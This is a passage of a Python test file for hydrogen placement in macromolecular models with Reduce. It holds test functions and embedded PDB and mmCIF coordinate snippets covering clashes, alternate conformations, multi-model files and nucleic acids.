hd_sel_without_h = model_without_h.get_hd_selection()
assert (hd_sel_without_h is not None)
assert (hd_sel_without_h.count(True) == 0)
# place H atoms again
reduce_add_h_obj = reduce_hydrogen.place_hydrogens(model = model_without_h)
reduce_add_h_obj.run()
#
model_h_added = reduce_add_h_obj.get_model()
hd_sel_h_added = model_h_added.get_hd_selection()
ph_h_added = model_h_added.get_hierarchy()
h_atoms_added = ph_h_added.select(hd_sel_h_added).atoms()
h_names_added = list(h_atoms_added.extract_name())
number_h_added = hd_sel_h_added.count(True)
#
assert ph_initial.is_similar_hierarchy(other=ph_h_added)
assert(number_h_expected == number_h_added)
if not_contains:
assert (not_contains not in h_names_added)
if contains:
assert (contains in h_names_added)
sc_h_initial = model_initial.select(hd_sel_initial).get_sites_cart()
sc_h_added = model_h_added.select(hd_sel_h_added).get_sites_cart()
d1 = {h_names_initial[i]: sc_h_initial[i] for i in range(len(h_names_initial))}
d2 = {h_names_added[i]: sc_h_added[i] for i in range(len(h_names_added))}
for name, sc in d2.items():
assert(name in d1)
assert approx_equal(sc, d1[name], 0.01), name
# ------------------------------------------------------------------------------
def test_000():
'''
CDL is true by default. Will crash for this example if is False.
'''
compare_models(pdb_str = pdb_str_000)
# ------------------------------------------------------------------------------
def test_001():
'''
clash between LYS 246 NZ & Tam 2 C5 --> fails in REDUCE
Removing either Lys 246 NZ, or TAM 2 C5, or both of Lys 246 HZ1 and HZ3 will
allow Reduce to run to completion and produce a usable result.
However, Lys 246 HZ1 and HZ3 will not be added back by Reduce.
'''
compare_models(pdb_str = pdb_str_001)
# ------------------------------------------------------------------------------
def test_002():
'''
Test if multi-model file is supported
'''
compare_models(pdb_str = pdb_str_002)
# ------------------------------------------------------------------------------
def test_003():
'''
Check if normal and modified nucleic acid work.
'''
compare_models(pdb_str = pdb_str_003)
# ------------------------------------------------------------------------------
def test_004():
'''
Check if dc is processed correctly: TYR dc with every atom in either A or B
'''
compare_models(pdb_str = pdb_str_004)
# ------------------------------------------------------------------------------
def test_005():
'''
Check if dc is processed correctly: Glu dc with atoms in A or B or '' (blank)
'''
compare_models(pdb_str = pdb_str_005)
# ------------------------------------------------------------------------------
def test_006():
'''
Check if model without H to be placed is correctly processed
'''
compare_models(pdb_str = pdb_str_006)
# ------------------------------------------------------------------------------
def test_007():
'''
Check if mmCIF file format works
'''
compare_models(pdb_str = pdb_str_007)
# ------------------------------------------------------------------------------
def test_008():
'''
Test CYS-CYS disulfide with double conformation
'''
compare_models(pdb_str = pdb_str_008)
# ------------------------------------------------------------------------------
def test_009():
'''
1KYC: SIN linked to GLU1, but later in file. Goal: no NH3 to GLU.
'''
compare_models(pdb_str = pdb_str_009)
assert 0
# ------------------------------------------------------------------------------
pdb_str_000 = """
REMARK This will crash if CDL is set to FALSE
CRYST1 72.240 72.010 86.990 90.00 90.00 90.00 P 21 21 21
ATOM 1 N PRO H 1 52.628 -74.147 33.427 1.00 20.43 N
ATOM 2 CA PRO H 1 53.440 -73.630 34.533 1.00 20.01 C
ATOM 3 C PRO H 1 54.482 -72.584 34.124 1.00 20.76 C
ATOM 4 O PRO H 1 55.025 -72.627 33.021 1.00 16.34 O
ATOM 5 CB PRO H 1 54.055 -74.895 35.134 1.00 22.06 C
ATOM 6 CG PRO H 1 54.084 -75.862 33.972 1.00 25.16 C
ATOM 7 CD PRO H 1 52.770 -75.608 33.294 1.00 17.36 C
ATOM 8 H2 PRO H 1 51.760 -73.969 33.583 1.00 20.43 H
ATOM 9 H3 PRO H 1 52.881 -73.753 32.659 1.00 20.43 H
ATOM 10 HA PRO H 1 52.877 -73.212 35.203 1.00 20.01 H
ATOM 11 HB2 PRO H 1 54.949 -74.711 35.461 1.00 22.06 H
ATOM 12 HB3 PRO H 1 53.499 -75.228 35.856 1.00 22.06 H
ATOM 13 HG2 PRO H 1 54.830 -75.664 33.385 1.00 25.16 H
ATOM 14 HG3 PRO H 1 54.147 -76.775 34.292 1.00 25.16 H
ATOM 15 HD3 PRO H 1 52.801 -75.872 32.361 1.00 17.36 H
ATOM 16 HD2 PRO H 1 52.048 -76.072 33.746 1.00 17.36 H
ATOM 17 N SER H 2 54.727 -71.646 35.038 1.00 21.70 N
ATOM 18 CA SER H 2 55.670 -70.537 34.874 1.00 25.33 C
ATOM 19 C SER H 2 55.049 -69.401 34.057 1.00 24.78 C
ATOM 20 O SER H 2 55.581 -68.291 34.023 1.00 27.51 O
ATOM 21 CB SER H 2 56.982 -71.005 34.219 1.00 25.20 C
ATOM 22 OG SER H 2 56.914 -70.938 32.802 1.00 28.91 O
ATOM 23 H SER H 2 54.335 -71.634 35.803 1.00 21.70 H
ATOM 24 HA SER H 2 55.899 -70.163 35.739 1.00 25.33 H
ATOM 25 HB2 SER H 2 57.705 -70.434 34.524 1.00 25.20 H
ATOM 26 HB3 SER H 2 57.151 -71.924 34.481 1.00 25.20 H
ATOM 27 HG SER H 2 56.769 -70.147 32.558 1.00 28.91 H
ATOM 28 N GLN H 3 53.918 -69.678 33.412 1.00 24.55 N
ATOM 29 CA GLN H 3 53.224 -68.673 32.611 1.00 29.39 C
ATOM 30 C GLN H 3 52.340 -67.778 33.475 1.00 28.13 C
ATOM 31 O GLN H 3 52.234 -67.987 34.681 1.00 26.35 O
ATOM 32 CB GLN H 3 52.371 -69.346 31.533 1.00 31.67 C
ATOM 33 CG GLN H 3 53.196 -70.112 30.524 1.00 44.80 C
ATOM 34 CD GLN H 3 54.379 -69.303 30.030 1.00 48.55 C
ATOM 35 OE1 GLN H 3 54.213 -68.269 29.386 1.00 52.45 O
ATOM 36 NE2 GLN H 3 55.584 -69.766 30.342 1.00 55.07 N
ATOM 37 H GLN H 3 53.530 -70.445 33.423 1.00 24.55 H
ATOM 38 HA GLN H 3 53.888 -68.112 32.179 1.00 29.39 H
ATOM 39 HB2 GLN H 3 51.871 -68.665 31.056 1.00 31.67 H
ATOM 40 HB3 GLN H 3 51.761 -69.970 31.957 1.00 31.67 H
ATOM 41 HG2 GLN H 3 53.533 -70.922 30.937 1.00 44.80 H
ATOM 42 HG3 GLN H 3 52.641 -70.335 29.761 1.00 44.80 H
ATOM 43 HE21 GLN H 3 56.287 -69.343 30.085 1.00 55.07 H
ATOM 44 HE22 GLN H 3 55.661 -70.489 30.801 1.00 55.07 H
"""
pdb_str_001 = """
REMARK this fails in REDUCE because of clash between LYS 246 NZ & Tam 2 C5
CRYST1 24.984 25.729 23.590 90.00 90.00 90.00 P 1
ATOM 1 N PRO A 245 13.194 10.192 16.658 1.00 41.32 N
ATOM 2 CA PRO A 245 12.939 11.276 15.705 1.00 43.09 C
ATOM 3 C PRO A 245 13.983 11.305 14.601 1.00 46.16 C
ATOM 4 O PRO A 245 15.086 10.768 14.728 1.00 44.69 O
ATOM 5 CB PRO A 245 13.007 12.541 16.569 1.00 42.50 C
ATOM 6 CG PRO A 245 13.795 12.147 17.772 1.00 47.69 C
ATOM 7 CD PRO A 245 13.504 10.698 18.006 1.00 45.37 C
REMARK ATOM 8 H2 PRO A 245 12.414 9.635 16.709 1.00 41.32 H
REMARK ATOM 9 H3 PRO A 245 13.938 9.673 16.344 1.00 41.32 H
ATOM 10 HA PRO A 245 12.051 11.211 15.320 1.00 43.09 H
ATOM 11 HB2 PRO A 245 13.452 13.251 16.080 1.00 42.50 H
ATOM 12 HB3 PRO A 245 12.112 12.820 16.817 1.00 42.50 H
ATOM 13 HG2 PRO A 245 14.740 12.283 17.601 1.00 47.69 H
ATOM 14 HG3 PRO A 245 13.515 12.679 18.533 1.00 47.69 H
ATOM 15 HD2 PRO A 245 14.279 10.246 18.375 1.00 45.37 H
ATOM 16 HD3 PRO A 245 12.744 10.590 18.598 1.00 45.37 H
ATOM 17 N LYS A 246 13.611 11.942 13.495 1.00 42.99 N
ATOM 18 CA LYS A 246 14.551 12.132 12.404 1.00 43.44 C
ATOM 19 C LYS A 246 15.633 13.122 12.832 1.00 46.25 C
ATOM 20 O LYS A 246 15.332 14.110 13.510 1.00 45.93 O
ATOM 21 CB LYS A 246 13.837 12.652 11.156 1.00 49.81 C
ATOM 22 CG LYS A 246 12.652 11.809 10.713 1.00 54.70 C
ATOM 23 CD LYS A 246 13.071 10.649 9.829 1.00 62.40 C
ATOM 24 CE LYS A 246 11.928 9.661 9.640 1.00 71.25 C
ATOM 25 NZ LYS A 246 10.594 10.329 9.556 1.00 76.52 N
ATOM 26 H LYS A 246 12.828 12.269 13.355 1.00 42.99 H
ATOM 27 HA LYS A 246 14.966 11.285 12.179 1.00 43.44 H
ATOM 28 HB2 LYS A 246 14.472 12.674 10.423 1.00 49.81 H
ATOM 29 HB3 LYS A 246 13.509 13.547 11.338 1.00 49.81 H
ATOM 30 HG2 LYS A 246 12.208 11.447 11.496 1.00 54.70 H
ATOM 31 HG3 LYS A 246 12.036 12.365 10.210 1.00 54.70 H
ATOM 32 HD2 LYS A 246 13.815 10.182 10.241 1.00 62.40 H
ATOM 33 HD3 LYS A 246 13.332 10.985 8.958 1.00 62.40 H
ATOM 34 HE2 LYS A 246 11.910 9.050 10.393 1.00 71.25 H
ATOM 35 HE3 LYS A 246 12.069 9.168 8.816 1.00 71.25 H
REMARK ATOM 36 HZ1 LYS A 246 9.955 9.720 9.446 1.00 76.52 H
REMARK ATOM 37 HZ2 LYS A 246 10.578 10.892 8.867 1.00 76.52 H
REMARK ATOM 38 HZ3 LYS A 246 10.434 10.784 10.304 1.00 76.52 H
ATOM 39 N PRO A 247 16.897 12.890 12.459 1.00 44.07 N
ATOM 40 CA PRO A 247 17.961 13.810 12.905 1.00 39.69 C
ATOM 41 C PRO A 247 17.659 15.272 12.622 1.00 41.96 C
ATOM 42 O PRO A 247 17.848 16.127 13.497 1.00 43.51 O
ATOM 43 CB PRO A 247 19.188 13.316 12.126 1.00 43.94 C
ATOM 44 CG PRO A 247 18.912 11.884 11.852 1.00 47.67 C
ATOM 45 CD PRO A 247 17.430 11.781 11.650 1.00 44.76 C
ATOM 46 HA PRO A 247 18.124 13.716 13.857 1.00 39.69 H
ATOM 47 HB3 PRO A 247 19.279 13.817 11.300 1.00 43.94 H
ATOM 48 HB2 PRO A 247 19.987 13.419 12.667 1.00 43.94 H
ATOM 49 HG2 PRO A 247 19.193 11.346 12.609 1.00 47.67 H
ATOM 50 HG3 PRO A 247 19.387 11.607 11.053 1.00 47.67 H
ATOM 51 HD2 PRO A 247 17.201 11.896 10.714 1.00 44.76 H
ATOM 52 HD3 PRO A 247 17.097 10.929 11.971 1.00 44.76 H
TER
HETATM 53 N TAM H 2 9.323 12.496 7.335 1.00 20.00 N
HETATM 54 C TAM H 2 8.060 12.492 8.002 1.00 20.00 C
HETATM 55 C1 TAM H 2 7.540 13.901 8.071 1.00 20.00 C
HETATM 56 C2 TAM H 2 8.386 11.881 9.335 1.00 20.00 C
HETATM 57 C3 TAM H 2 7.035 11.686 7.294 1.00 20.00 C
HETATM 58 C4 TAM H 2 7.128 14.539 6.744 1.00 20.00 C
HETATM 59 C5 TAM H 2 8.930 10.458 9.271 1.00 20.00 C
HETATM 60 C6 TAM H 2 5.660 11.992 7.821 1.00 20.00 C
HETATM 61 O4 TAM H 2 5.710 14.391 6.585 1.00 20.00 O
HETATM 62 O5 TAM H 2 7.872 9.487 9.299 1.00 20.00 O
HETATM 63 O6 TAM H 2 5.714 12.262 9.200 1.00 20.00 O
"""
pdb_str_002 = """
REMARK This is a multi model file --> check if this works
CRYST1 16.760 20.171 17.648 90.00 90.00 90.00 P 1
MODEL 1
ATOM 1 N GLY A -3 14.573 7.304 5.082 1.00 23.20 N
ATOM 2 CA GLY A -3 15.503 6.752 6.050 1.00 43.12 C
ATOM 3 C GLY A -3 16.822 7.516 6.092 1.00 10.33 C
ATOM 4 O GLY A -3 17.833 7.000 5.608 1.00 34.23 O
ATOM 5 HA2 GLY A -3 15.692 5.828 5.822 1.00 43.12 H
ATOM 6 HA3 GLY A -3 15.103 6.784 6.933 1.00 43.12 H
ATOM 7 N PRO A -2 16.855 8.759 6.667 1.00 43.42 N
ATOM 8 CA PRO A -2 18.084 9.573 6.756 1.00 72.12 C
ATOM 9 C PRO A -2 19.050 9.085 7.843 1.00 24.33 C
ATOM 10 O PRO A -2 20.269 9.138 7.662 1.00 1.42 O
ATOM 11 CB PRO A -2 17.569 10.986 7.098 1.00 65.32 C
ATOM 12 CG PRO A -2 16.078 10.915 7.005 1.00 23.11 C
ATOM 13 CD PRO A -2 15.713 9.483 7.257 1.00 3.14 C
ATOM 14 HA PRO A -2 18.527 9.578 5.893 1.00 72.12 H
ATOM 15 HB2 PRO A -2 17.846 11.226 7.996 1.00 65.32 H
ATOM 16 HB3 PRO A -2 17.923 11.625 6.460 1.00 65.32 H
ATOM 17 HG2 PRO A -2 15.793 11.190 6.120 1.00 23.11 H
ATOM 18 HG3 PRO A -2 15.682 11.493 7.676 1.00 23.11 H
ATOM 19 HD2 PRO A -2 15.639 9.304 8.207 1.00 3.14 H
ATOM 20 HD3 PRO A -2 14.884 9.250 6.810 1.00 3.14 H
ATOM 21 N SER A -1 18.485 8.603 8.974 1.00 54.30 N
ATOM 22 CA SER A -1 19.258 8.090 10.133 1.00 74.21 C
ATOM 23 C SER A -1 20.126 9.182 10.770 1.00 44.31 C
ATOM 24 O SER A -1 20.919 9.834 10.087 1.00 24.24 O
ATOM 25 CB SER A -1 20.129 6.881 9.741 1.00 35.31 C
ATOM 26 OG SER A -1 20.678 6.247 10.885 1.00 34.24 O
ATOM 27 H SER A -1 17.635 8.561 9.098 1.00 54.30 H
ATOM 28 HA SER A -1 18.623 7.790 10.802 1.00 74.21 H
ATOM 29 HB2 SER A -1 20.854 7.187 9.174 1.00 35.31 H
ATOM 30 HB3 SER A -1 19.580 6.241 9.261 1.00 35.31 H
ATOM 31 HG SER A -1 21.157 6.789 11.312 1.00 34.24 H
TER
ENDMDL
MODEL 2
ATOM 35 N GLY A -3 15.598 12.155 12.730 1.00 23.20 N
ATOM 36 CA GLY A -3 15.801 13.217 11.761 1.00 43.12 C
ATOM 37 C GLY A -3 15.603 12.746 10.322 1.00 10.33 C
ATOM 38 O GLY A -3 14.940 11.727 10.105 1.00 34.23 O
ATOM 39 HA3 GLY A -3 15.172 13.934 11.936 1.00 43.12 H
ATOM 40 HA2 GLY A -3 16.704 13.561 11.848 1.00 43.12 H
ATOM 41 N PRO A -2 16.164 13.467 9.301 1.00 43.42 N
ATOM 42 CA PRO A -2 16.028 13.090 7.880 1.00 72.12 C
ATOM 43 C PRO A -2 16.904 11.891 7.491 1.00 24.33 C
ATOM 44 O PRO A -2 16.479 11.039 6.705 1.00 1.42 O
ATOM 45 CB PRO A -2 16.479 14.351 7.114 1.00 65.32 C
ATOM 46 CG PRO A -2 16.651 15.418 8.147 1.00 23.11 C
ATOM 47 CD PRO A -2 16.953 14.708 9.432 1.00 3.14 C
ATOM 48 HA PRO A -2 15.094 12.906 7.692 1.00 72.12 H
ATOM 49 HB2 PRO A -2 17.317 14.174 6.659 1.00 65.32 H
ATOM 50 HB3 PRO A -2 15.799 14.602 6.470 1.00 65.32 H
ATOM 51 HG3 PRO A -2 15.832 15.932 8.224 1.00 23.11 H
ATOM 52 HG2 PRO A -2 17.386 15.999 7.896 1.00 23.11 H
ATOM 53 HD2 PRO A -2 17.900 14.513 9.508 1.00 3.14 H
ATOM 54 HD3 PRO A -2 16.659 15.229 10.196 1.00 3.14 H
ATOM 55 N SER A -1 18.123 11.839 8.047 1.00 54.30 N
ATOM 56 CA SER A -1 19.064 10.752 7.768 1.00 74.21 C
ATOM 57 C SER A -1 19.650 10.188 9.066 1.00 44.31 C
ATOM 58 O SER A -1 19.683 8.969 9.256 1.00 24.24 O
ATOM 59 CB SER A -1 20.187 11.243 6.843 1.00 35.31 C
ATOM 60 OG SER A -1 20.983 10.164 6.382 1.00 34.24 O
ATOM 61 H SER A -1 18.429 12.428 8.594 1.00 54.30 H
ATOM 62 HA SER A -1 18.597 10.032 7.316 1.00 74.21 H
ATOM 63 HB2 SER A -1 20.750 11.861 7.334 1.00 35.31 H
ATOM 64 HB3 SER A -1 19.791 11.690 6.079 1.00 35.31 H
ATOM 65 HG SER A -1 21.333 9.767 7.034 1.00 34.24 H
TER
ENDMDL
"""
pdb_str_003 = """
REMARK PDB snippet with a normal and a modified nucleic acid
CRYST1 17.826 22.060 19.146 90.00 90.00 90.00 P 1
ATOM 1 P U A 2 7.236 16.525 9.726 1.00 37.21 P
ATOM 2 OP1 U A 2 6.663 17.060 10.993 1.00 38.75 O
ATOM 3 OP2 U A 2 8.650 16.805 9.385 1.00 34.84 O
ATOM 4 O5' U A 2 7.029 14.947 9.685 1.00 34.31 O
ATOM 5 C5' U A 2 5.756 14.354 9.974 1.00 37.02 C
ATOM 6 C4' U A 2 5.821 12.860 9.763 1.00 36.81 C
ATOM 7 O4' U A 2 5.957 12.552 8.350 1.00 36.96 O
ATOM 8 C3' U A 2 7.025 12.178 10.388 1.00 36.55 C
ATOM 9 O3' U A 2 6.846 11.969 11.775 1.00 36.22 O
ATOM 10 C2' U A 2 7.106 10.884 9.592 1.00 36.94 C
ATOM 11 O2' U A 2 6.138 9.930 9.980 1.00 38.55 O
ATOM 12 C1' U A 2 6.755 11.383 8.191 1.00 36.22 C
ATOM 13 N1 U A 2 7.938 11.735 7.391 1.00 34.47 N
ATOM 14 C2 U A 2 8.652 10.705 6.795 1.00 33.67 C
ATOM 15 O2 U A 2 8.375 9.526 6.954 1.00 33.54 O
ATOM 16 N3 U A 2 9.706 11.110 6.014 1.00 33.13 N
ATOM 17 C4 U A 2 10.119 12.408 5.784 1.00 32.43 C
ATOM 18 O4 U A 2 11.043 12.620 5.000 1.00 31.05 O
ATOM 19 C5 U A 2 9.352 13.409 6.464 1.00 33.80 C
ATOM 20 C6 U A 2 8.316 13.048 7.223 1.00 33.46 C
ATOM 21 H4* U A 2 5.000 12.459 10.088 1.00 36.81 H
ATOM 22 H3* U A 2 7.826 12.702 10.232 1.00 36.55 H
ATOM 23 H2* U A 2 7.997 10.505 9.648 1.00 36.94 H
ATOM 24 HO2* U A 2 5.578 9.841 9.360 1.00 38.55 H
ATOM 25 H1* U A 2 6.256 10.694 7.724 1.00 36.22 H
ATOM 26 H5 U A 2 9.576 14.307 6.377 1.00 33.80 H
ATOM 27 H5*2 U A 2 5.515 14.540 10.895 1.00 37.02 H
ATOM 28 H5*1 U A 2 5.082 14.734 9.388 1.00 37.02 H
ATOM 29 H3 U A 2 10.157 10.489 5.626 1.00 33.13 H
ATOM 30 H6 U A 2 7.829 13.711 7.657 1.00 33.46 H
HETATM 31 P UMS A 3 8.115 12.049 12.757 1.00 35.65 P
HETATM 32 OP1 UMS A 3 7.608 12.006 14.146 1.00 37.56 O
HETATM 33 OP2 UMS A 3 8.986 13.173 12.329 1.00 35.79 O
HETATM 34 O5' UMS A 3 8.946 10.722 12.449 1.00 37.12 O
HETATM 35 C5' UMS A 3 8.323 9.447 12.591 1.00 36.88 C
HETATM 36 C4' UMS A 3 9.203 8.363 12.041 1.00 39.11 C
HETATM 37 O4' UMS A 3 9.187 8.277 10.585 1.00 38.36 O
HETATM 38 C3' UMS A 3 10.640 8.278 12.458 1.00 40.33 C
HETATM 39 O3' UMS A 3 10.895 8.001 13.828 1.00 40.80 O
HETATM 40 C2' UMS A 3 11.291 7.467 11.374 1.00 40.93 C
HETATM 41 C1' UMS A 3 10.496 7.904 10.133 1.00 38.75 C
HETATM 42 N1 UMS A 3 11.106 9.042 9.429 1.00 36.80 N
HETATM 43 C2 UMS A 3 12.013 8.736 8.436 1.00 35.25 C
HETATM 44 O2 UMS A 3 12.328 7.589 8.163 1.00 36.36 O
HETATM 45 N3 UMS A 3 12.557 9.822 7.786 1.00 33.98 N
HETATM 46 C4 UMS A 3 12.275 11.159 7.996 1.00 32.51 C
HETATM 47 O4 UMS A 3 12.826 12.001 7.302 1.00 33.01 O
HETATM 48 C5 UMS A 3 11.323 11.402 9.046 1.00 33.90 C
HETATM 49 C6 UMS A 3 10.817 10.354 9.743 1.00 34.62 C
HETATM 50 CA' UMS A 3 11.776 5.000 13.480 1.00 46.26 C
HETATM 51 SE2' UMS A 3 10.815 5.400 11.905 1.00 48.17 Se
HETATM 53 H3* UMS A 3 11.022 9.152 12.279 1.00 40.33 H
HETATM 54 H3 UMS A 3 13.140 9.648 7.179 1.00 33.98 H
HETATM 55 H1* UMS A 3 10.387 7.156 9.525 1.00 38.75 H
HETATM 56 H6 UMS A 3 10.252 10.527 10.462 1.00 34.62 H
HETATM 57 H4* UMS A 3 8.782 7.553 12.369 1.00 39.11 H
HETATM 58 H5*2 UMS A 3 7.481 9.448 12.109 1.00 36.88 H
HETATM 59 H5 UMS A 3 11.056 12.270 9.246 1.00 33.90 H
HETATM 60 H5* UMS A 3 8.158 9.276 13.531 1.00 36.88 H
HETATM 64 H2* UMS A 3 12.022 6.833 11.440 1.00 40.93 H
"""
pdb_str_004 = '''
REMARK TYR double conformation where *every* atom is in either A or B
CRYST1 15.639 15.148 16.657 90.00 90.00 90.00 P 1
ATOM 1 N ATYR A 59 5.624 5.492 5.997 0.63 5.05 N
ATOM 2 CA ATYR A 59 6.283 5.821 7.250 0.63 5.48 C
ATOM 3 C ATYR A 59 5.451 6.841 8.030 0.63 6.01 C
ATOM 4 O ATYR A 59 5.000 7.863 7.506 0.63 6.38 O
ATOM 5 CB ATYR A 59 7.724 6.421 6.963 0.63 5.57 C
ATOM 6 CG ATYR A 59 8.212 7.215 8.170 0.63 6.71 C
ATOM 7 CD1ATYR A 59 8.690 6.541 9.297 0.63 7.05 C
ATOM 8 CD2ATYR A 59 8.071 8.583 8.242 0.63 8.31 C
ATOM 9 CE1ATYR A 59 9.100 7.172 10.481 0.63 7.99 C
ATOM 10 CE2ATYR A 59 8.408 9.230 9.447 0.63 9.07 C
ATOM 11 CZ ATYR A 59 8.919 8.547 10.507 0.63 9.01 C
ATOM 12 OH ATYR A 59 9.211 9.255 11.657 0.63 12.31 O
ATOM 13 HA ATYR A 59 6.384 5.020 7.788 0.63 5.48 H
ATOM 14 HB2ATYR A 59 7.683 7.014 6.196 0.63 5.57 H
ATOM 15 HB3ATYR A 59 8.349 5.699 6.792 0.63 5.57 H
ATOM 16 HD1ATYR A 59 8.740 5.613 9.260 0.63 7.05 H
ATOM 17 HD2ATYR A 59 7.760 9.068 7.512 0.63 8.31 H
ATOM 18 HE1ATYR A 59 9.466 6.703 11.196 0.63 7.99 H
ATOM 19 HE2ATYR A 59 8.278 10.148 9.520 0.63 9.07 H
ATOM 20 HH ATYR A 59 9.058 10.072 11.538 0.63 12.31 H
ATOM 21 N BTYR A 59 5.613 5.513 5.963 0.37 5.75 N
ATOM 22 CA BTYR A 59 6.322 5.809 7.211 0.37 5.49 C
ATOM 23 C BTYR A 59 5.795 6.953 8.094 0.37 5.14 C
ATOM 24 O BTYR A 59 5.668 8.090 7.641 0.37 6.42 O
ATOM 25 CB BTYR A 59 7.798 6.076 6.900 0.37 7.77 C
ATOM 26 CG BTYR A 59 8.556 6.722 8.038 0.37 5.20 C
ATOM 27 CD1BTYR A 59 9.162 5.951 9.021 0.37 8.94 C
ATOM 28 CD2BTYR A 59 8.665 8.103 8.129 0.37 6.25 C
ATOM 29 CE1BTYR A 59 9.856 6.537 10.063 0.37 11.97 C
ATOM 30 CE2BTYR A 59 9.357 8.699 9.167 0.37 9.52 C
ATOM 31 CZ BTYR A 59 9.950 7.911 10.131 0.37 12.68 C
ATOM 32 OH BTYR A 59 10.639 8.500 11.166 0.37 26.50 O
ATOM 33 HA BTYR A 59 6.185 5.019 7.758 0.37 5.49 H
ATOM 34 HB2BTYR A 59 7.853 6.669 6.134 0.37 7.77 H
ATOM 35 HB3BTYR A 59 8.231 5.232 6.698 0.37 7.77 H
ATOM 36 HD1BTYR A 59 9.100 5.024 8.978 0.37 8.94 H
ATOM 37 HD2BTYR A 59 8.266 8.637 7.480 0.37 6.25 H
ATOM 38 HE1BTYR A 59 10.257 6.008 10.714 0.37 11.97 H
ATOM 39 HE2BTYR A 59 9.422 9.625 9.215 0.37 9.52 H
ATOM 40 HH BTYR A 59 10.618 9.336 11.086 0.37 26.50 H
'''
pdb_str_005 = '''
REMARK Glu double conformation where atoms are either A, B or '' (blank)
CRYST1 13.702 13.985 14.985 90.00 90.00 90.00 P 1
ATOM 1 N GLU A 78 8.702 8.360 5.570 1.00 35.65 N
ATOM 2 C GLU A 78 6.379 7.842 5.202 1.00 35.59 C
ATOM 3 O GLU A 78 5.975 8.985 5.000 1.00 35.38 O
ATOM 4 CA AGLU A 78 7.598 7.571 6.076 0.70 35.57 C
ATOM 5 CB AGLU A 78 7.301 7.887 7.536 0.70 35.75 C
ATOM 6 CG AGLU A 78 6.481 6.798 8.188 0.70 36.10 C
ATOM 7 CD AGLU A 78 5.833 7.232 9.476 0.70 37.70 C
ATOM 8 OE1AGLU A 78 6.155 8.333 9.982 0.70 38.74 O
ATOM 9 OE2AGLU A 78 5.000 6.456 9.985 0.70 37.65 O
ATOM 10 HA AGLU A 78 7.819 6.627 6.051 0.70 35.57 H
ATOM 11 HB2AGLU A 78 6.802 8.717 7.588 0.70 35.75 H
ATOM 12 HB3AGLU A 78 8.137 7.971 8.021 0.70 35.75 H
ATOM 13 HG2AGLU A 78 5.778 6.526 7.578 0.70 36.10 H
ATOM 14 HG3AGLU A 78 7.059 6.044 8.385 0.70 36.10 H
ATOM 15 CA BGLU A 78 7.581 7.608 6.115 0.30 35.61 C
ATOM 16 CB BGLU A 78 7.269 8.093 7.534 0.30 35.70 C
ATOM 17 CG BGLU A 78 6.166 7.322 8.245 0.30 36.05 C
ATOM 18 CD BGLU A 78 6.683 6.115 9.003 0.30 36.79 C
ATOM 19 OE1BGLU A 78 7.585 6.285 9.856 0.30 37.19 O
ATOM 20 OE2BGLU A 78 6.173 5.000 8.760 0.30 37.31 O
ATOM 21 HA BGLU A 78 7.779 6.660 6.170 0.30 35.61 H
ATOM 22 HB2BGLU A 78 8.073 8.013 8.070 0.30 35.70 H
ATOM 23 HB3BGLU A 78 6.992 9.022 7.488 0.30 35.70 H
ATOM 24 HG3BGLU A 78 5.525 7.010 7.587 0.30 36.05 H
ATOM 25 HG2BGLU A 78 5.730 7.910 8.881 0.30 36.05 H
'''
pdb_str_006 = '''
REMARK Hg, Sr and HOH: no H atoms are expected to be placed
CRYST1 10.286 24.260 13.089 90.00 90.00 90.00 P 1
HETATM 1 HG HG A 101 5.000 7.056 5.951 0.60 17.71 HG
HETATM 2 SR SR A 102 5.182 10.793 8.089 0.85 18.78 SR
HETATM 3 O HOH A 201 5.093 5.000 5.000 1.00 25.34 O
HETATM 4 O HOH A 202 5.286 19.260 7.818 1.00 28.43 O
'''
# check if mmCIF file works
pdb_str_007 = '''
data_1UBQ
#
_entry.id 1UBQ
#
_cell.entry_id 1UBQ
_cell.length_a 50.840
_cell.length_b 42.770
_cell.length_c 28.950
_cell.angle_alpha 90.00
_cell.angle_beta 90.00
_cell.angle_gamma 90.00
_cell.Z_PDB 4
#
_symmetry.entry_id 1UBQ
_symmetry.space_group_name_H-M 'P 21 21 21'
_symmetry.Int_Tables_number 19
#
loop_
_atom_site.group_PDB
_atom_site.id
_atom_site.type_symbol
_atom_site.label_atom_id
_atom_site.label_alt_id
_atom_site.label_comp_id
_atom_site.label_asym_id
_atom_site.label_entity_id
_atom_site.label_seq_id
_atom_site.pdbx_PDB_ins_code
_atom_site.Cartn_x
_atom_site.Cartn_y
_atom_site.Cartn_z
_atom_site.occupancy
_atom_site.B_iso_or_equiv
_atom_site.pdbx_formal_charge
_atom_site.auth_seq_id
_atom_site.auth_comp_id
_atom_site.auth_asym_id
_atom_site.auth_atom_id
_atom_site.pdbx_PDB_model_num
ATOM 594 N N . GLY A 1 75 ? 41.165 35.531 31.898 0.25 36.31 ? 75 GLY A N 1
ATOM 595 C CA . GLY A 1 75 ? 41.845 36.550 32.686 0.25 36.07 ? 75 GLY A CA 1
ATOM 596 C C . GLY A 1 75 ? 41.251 37.941 32.588 0.25 36.16 ? 75 GLY A C 1
ATOM 597 O O . GLY A 1 75 ? 41.102 38.523 31.500 0.25 36.26 ? 75 GLY A O 1
ATOM 598 H HA2 . GLY A 1 75 ? 42.768 36.603 32.393 0.25 36.07 ? 75 GLY A HA3 1
ATOM 599 H HA3 . GLY A 1 75 ? 41.823 36.286 33.619 0.25 36.07 ? 75 GLY A HA2 1
ATOM 600 N N . GLY A 1 76 ? 40.946 38.472 33.757 0.25 36.05 ? 76 GLY A N 1
ATOM 601 C CA . GLY A 1 76 ? 40.373 39.813 33.944 0.25 36.19 ? 76 GLY A CA 1
ATOM 602 C C . GLY A 1 76 ? 40.031 39.992 35.432 0.25 36.20 ? 76 GLY A C 1
ATOM 603 O O . GLY A 1 76 ? 38.933 40.525 35.687 0.25 36.13 ? 76 GLY A O 1
ATOM 604 O OXT . GLY A 1 76 ? 40.862 39.575 36.251 0.25 36.27 ? 76 GLY A OXT 1
ATOM 605 H H . GLY A 1 76 ? 41.063 38.062 34.504 0.25 36.05 ? 76 GLY A H 1
ATOM 606 H HA3 . GLY A 1 76 ? 39.566 39.910 33.413 0.25 36.19 ? 76 GLY A HA3 1
ATOM 607 H HA2 . GLY A 1 76 ? 41.011 40.491 33.675 0.25 36.19 ? 76 GLY A HA2 1
HETATM 611 O O . HOH B 2 . ? 45.747 30.081 19.708 1.00 12.43 ? 77 HOH A O 1
'''
pdb_str_008 = '''
REMARK disulfide bond with altloc
CRYST1 13.626 15.799 17.617 90.00 90.00 90.00 P 1
ATOM 1 N CYS A 27 17.541 4.439 12.897 1.00 13.99 N
ATOM 2 CA CYS A 27 16.566 5.527 12.862 1.00 14.57 C
